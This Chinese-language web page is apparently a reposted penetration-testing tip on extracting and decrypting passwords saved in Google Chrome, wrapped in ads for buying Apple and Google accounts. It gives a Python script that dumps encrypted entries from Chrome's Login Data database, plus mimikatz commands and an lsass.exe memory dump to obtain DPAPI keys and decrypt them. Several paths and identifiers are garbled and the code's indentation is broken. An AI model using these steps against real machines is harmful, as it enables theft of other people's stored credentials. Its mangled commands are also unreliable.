国外苹果ID/美日韩台、新加坡、香港等——点击购买
韩国区已过年龄认证17+ 19+ 的苹果id游戏应用下载
独享美区ID小火箭账号——购买正版苹果商店礼品卡、软件兑换码
---------------------------------------------------------------------------------
谷歌锁区号/谷歌邮箱老号-购买商城-谷歌PLAY锁区账号/美区、日区,韩区,台区,新加坡谷歌账号等谷歌账号购买、代注册谷歌账号,代申诉解封———>点击购买
通过阅读 保存密码:
1.检查是否有密文谷歌导出保存的账号密码,用于读取数据库文件,提取密文
dir /a %% 数据
使用脚本读取登录数据并保存到文件中,代码如下:
from os import getenv
import sqlite3
import binascii
conn = sqlite3.connect("Login Data")
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
print (binascii.b2a_hex(result[2]))
f = open('test.txt', 'wb')
f.write(result[2])
f.close()
脚本执行后,提取Login Data中保存的密文谷歌导出保存的账号密码,保存为test.txt
2.获取密文对应的Key File
dpapi::blob /in:test.txt
得到对应的{-b4d7-40c8-b536-}
即Key文件的路径为%%%SID%-b4d7-40c8-b536-
3.从lsass进程中提取Key
privilege::debug
sekurlsa::dpapi
提取的密钥是
如果这里不能直接使用在线阅读,可以转储.exe --ma lsass.exe lsass.dmp,然后在本地解压Key
注意:从lsass进程中提取出Key后,Key会自动添加到系统缓存中
4.得到Key,然后就可以直接解密当前存放在text.txt中的密文
dpapi::blob /in test.txt
通过阅读 保存密码:
前提条件:已知电脑账号密码
解密过程:我们需要得到两个文件:
1.登录数据数据库文件:目录位置%%~
2. %%oft 下载其中的文件夹
参考文章:
1.渗透技巧——使用保存在浏览器中的密码导出离线/
2、
国外苹果ID/美日韩台、新加坡、香港等——韩国区已过年龄认证17+ 19+ 的苹果id游戏应用下载——独享美区ID小火箭账号-——正版苹果商店礼品卡、软件兑换码点击购买
谷歌锁区号/谷歌邮箱老号-购买商城-谷歌PLAY锁区账号/美区、日区,韩区,台区,新加坡谷歌账号等谷歌账号购买、代注册谷歌账号,代申诉解封———>点击购买
原文链接:通过读取谷歌浏览器保存密码:读取数据库文件并提取出Key,转载请注明来源!